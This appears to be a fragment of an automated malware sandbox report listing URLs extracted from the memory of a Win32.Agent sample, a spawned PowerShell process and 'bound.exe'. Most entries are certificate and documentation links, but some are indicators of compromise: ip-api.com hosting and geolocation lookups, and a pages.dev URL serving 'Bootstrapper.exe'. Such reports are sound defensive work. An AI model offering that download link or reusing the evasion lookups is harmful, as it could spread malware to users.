SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, 
SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387811652.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393699319.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388152864.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387713153.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388984719.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388063049.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1391172861.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393941866.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388593417.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390354928.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388449108.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387811652.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, 
SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393699319.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388152864.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: _queue.pyd.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000002.1504216075.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387713153.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388984719.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388063049.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1391172861.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393941866.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388593417.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390354928.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388449108.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, 
SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387811652.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393699319.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388152864.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1405743507.000001DCB591A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
Source: bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://edge-term4-fra2.roblox.com
Source: bound.exe, 00000011.00000002.1605507236.00000254B6B55000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://getsolara.dev
Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB586F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://google.com/
Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB586F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://google.com/mail/
Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5E94000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB586F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412898887.000001DCB5E94000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414429279.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5EB2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/json/?fields=225545r
Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: bound.exe, 00000011.00000000.1421291834.00000254B4B62000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: http://james.newtonking.com/projects/json
Source: bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nodejs.org
Source: powershell.exe, 0000000B.00000002.1523088933.000001E36B2F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000002.1504216075.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387713153.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388984719.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388063049.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1391172861.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393941866.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388593417.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390354928.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388449108.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, 
SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387811652.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393699319.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388152864.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387713153.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388984719.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388063049.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1391172861.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393941866.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388593417.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390354928.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388449108.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, 
SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387811652.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393699319.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388152864.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387713153.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388984719.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388063049.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1391172861.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393941866.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388593417.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390354928.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388449108.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, 
SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387811652.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393699319.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388152864.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387713153.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388984719.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388063049.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1391172861.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393941866.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388593417.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390354928.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388449108.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387811652.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, 
SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393699319.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388152864.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0X
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                Source: powershell.exe, 0000000B.00000002.1500577512.000001E35B4AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393361650.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393361650.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
                Source: powershell.exe, 0000000B.00000002.1500577512.000001E35B4AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: powershell.exe, 0000000B.00000002.1500577512.000001E35B281000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6B3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 0000000B.00000002.1500577512.000001E35B4AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462623142.000001DCB6380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393361650.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393361650.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393361650.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                Source: Amcache.hve.29.drString found in binary or memory: http://upx.sf.net
                Source: powershell.exe, 0000000B.00000002.1500577512.000001E35B4AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000002.1504216075.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387713153.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388984719.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388063049.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1391172861.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393941866.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388593417.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390354928.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388449108.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, 
SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387811652.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393699319.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388152864.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://www.digicert.com/CPS0
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB5935000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.nodejs.org
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6C1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://99ab5d9c.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe
